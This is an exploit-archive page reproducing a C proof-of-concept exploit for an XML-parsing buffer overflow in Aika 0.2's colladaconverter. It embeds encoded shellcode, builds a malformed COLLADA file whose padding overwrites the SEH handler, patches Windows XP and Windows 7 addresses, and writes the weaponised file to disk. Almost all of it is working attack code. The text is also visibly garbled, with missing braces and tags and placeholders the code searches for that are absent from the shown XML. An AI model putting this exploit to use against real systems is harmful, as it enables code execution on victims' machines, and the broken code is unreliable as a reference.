Aika 0.2 – colladaconverter Xml Parsing Buffer Overflow

  • 作者: isciurus
    日期: 2011-09-12
  • 类别:
  • 来源:
  • /*
    	# Exploit Title: Aika colladaconverter buffer overflow exploit
    	# Date: 09/11/2011
    	# Author: isciurus
    	# Software Link:
    	# Version: 0.2
    	# Tested on: Windows 7 x64
    This program is free software: you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation, either version 3 of the License, or
    (at your option) any later version.
    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    GNU General Public License for more details.
    You should have received a copy of the GNU General Public License
    along with this program.If not, see <>.
    #include <stdio.h>
    #include <windows.h>
    #include <stdlib.h>
    #include "string.h"
    char printableASCIIShellcode[] = 	// encoded 499 bytes
    	"WUQQUj3hKzJYSaRYjVCX4VGRH4z0BfXRQPPZjQX4QP2BM0BMX2Ai0BMXYZPOCKHG" // will be injected inside the file path ---------
    	"GDNW6jYeJ8l47kSCPlKPRZljwLskRH6RQ0OiKjRENz4TUYHTfu6rjMTi1NAjGwMF" //|
    	"RHxIjxgzoZnVXlGIXJbCJYhxKHXKvjyFXDDLbNydxzXT3vTJdfa7Hpp3VM1jUOVv" //|
    	"HLvt4zVFHLkLxBQR5XsKpEN90RgdBZlNmISLELGsEL0myBVKzJY"; //|
    char xml[] = //|
    	"<?xml version=\"1.0\" encoding=\"utf8\"?>"//|
    	"<COLLADA xmlns=\"\" version=\"1.4.1\">" //|
    "<comments>The shellcode encoded with</comments>" // |
    "</contributor>" //|
    "<unit meter=\"0.01\" name=\"centimeter\"/>" //|
    "</asset>" //|
    "<camera id=\"cameraShape1\" name=\"cameraShape1\">" //|
    "<optics>" //|
    "<technique_common>" //|
    "<yfov>37.8492</yfov>" //|
    "<aspect_ratio>1.5</aspect_ratio>" //|
    "<znear>1</znear>" //|
    "<zfar>10000</zfar>" //|
    "</perspective>" //|
    "</library_cameras>" //|
    "<library_images>" //|
    "<image id=\"file2\" name=\"file2\" depth=\"1\">"//|
    	// ^
    	// | 
    	//------------------------------------------------- the shellcode will be copied at this address
    	"		</init_from>"
    	"	<image id=\"file3\" name=\"file3\" depth=\"1\">"
    	// ^
    	// | 
    	//-------------------------------------------------------- these bytes will overwrite SEH handler
    	"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" // this part forces the application to write outside							
    	"AAAAAAAAAAAAAAAAAAAA"	// the stack and triggers AV exception		
    	"		</init_from>"
    "<material id=\"blinn3\" name=\"blinn3\">"
    "<instance_effect url=\"#blinn3-fx\"/>"
    "<geometry id=\"LOD3spShape-lib\" name=\"LOD3spShape\">"
    "<source id=\"LOD3spShape-lib-positions\" name=\"position\">"
    "<accessor count=\"2108\" offset=\"0\" source=\"#LOD3spShape-lib-positions-array\" stride=\"3\">"
    "<param name=\"X\" type=\"float\"/>"
    "<param name=\"Y\" type=\"float\"/>"
    "<param name=\"Z\" type=\"float\"/>"
    "<source id=\"LOD3spShape-lib-normals\" name=\"normal\">"
    "<accessor count=\"2290\" offset=\"0\" source=\"#LOD3spShape-lib-normals-array\" stride=\"3\">"
    "<param name=\"X\" type=\"float\"/>"
    "<param name=\"Y\" type=\"float\"/>"
    "<param name=\"Z\" type=\"float\"/>"
    "<source id=\"LOD3spShape-lib-map1\" name=\"map1\">"
    "<accessor count=\"2277\" offset=\"0\" source=\"#LOD3spShape-lib-map1-array\" stride=\"2\">"
    "<param name=\"S\" type=\"float\"/>"
    "<param name=\"T\" type=\"float\"/>"
    "<vertices id=\"LOD3spShape-lib-vertices\">"
    "<input semantic=\"POSITION\" source=\"#LOD3spShape-lib-positions\"/>"
    "<triangles count=\"4212\" material=\"blinn3SG\">"
    "<input offset=\"0\" semantic=\"VERTEX\" source=\"#LOD3spShape-lib-vertices\"/>"
    "<input offset=\"1\" semantic=\"NORMAL\" source=\"#LOD3spShape-lib-normals\"/>"
    "<input offset=\"2\" semantic=\"TEXCOORD\" source=\"#LOD3spShape-lib-map1\" set=\"0\"/>"
    "<instance_visual_scene url=\"#VisualSceneNode\"/>"
    int main(int argc, char **argv)
    	FILE *xml_file;
    	char win7;
    	char *offset;
    	char *ll;
    	if(argc < 2)
    		printf("\nUsage: aika_bof <malformed_collada_xml_path>");
    		return 0;
    	if(sizeof(printableASCIIShellcode) > 644)
    		printf("\nSorry, the shellcode is too long, 644 chars is maximum");
    		return 0;
    		char os;
    		printf("\nChoose OS version ([X] for Windows XP, [7] for Windows 7):");
    		os = tolower(getchar());
    		if(os == 'x')
    			win7 = 0;
    		else if(os == '7')
    			win7 = 1;
    			printf("\nUnknown OS version");
    	printf("\n[*] Injecting the shellcode into the xml...");
    	offset = strstr(xml, "SSSSSSSSSSSSSSSSSSSSSSSSSSSS");
    	strncpy(offset, printableASCIIShellcode, sizeof(printableASCIIShellcode) - 1);
    	if(win7 == 1)
    		offset = strstr(xml, "ADDR_1");
    		strncpy(offset, "%40%02", sizeof("%40%02") -1);
    		offset = strstr(xml, "ADDR_2");
    		strncpy(offset, "%40%02", sizeof("%40%02") -1);
    		offset = strstr(xml, "ADDR_1");
    		strncpy(offset, "%40%01", sizeof("%40%01") -1);
    		offset = strstr(xml, "ADDR_2");
    		strncpy(offset, "%40%01", sizeof("%40%01") -1);
    	printf("\n[*] Writing %d bytes to %s...", sizeof(xml), argv[1]);
    	xml_file = fopen(argv[1], "wb");
    	if(xml_file == NULL)
    		printf("\nerror while opening %s", argv[1]);
    		return 0;
    	if(fwrite(xml, 1, sizeof(xml) - 1, xml_file) != sizeof(xml) - 1)
    		printf("\nerror while writing into %s", argv[1]);
    		return 0;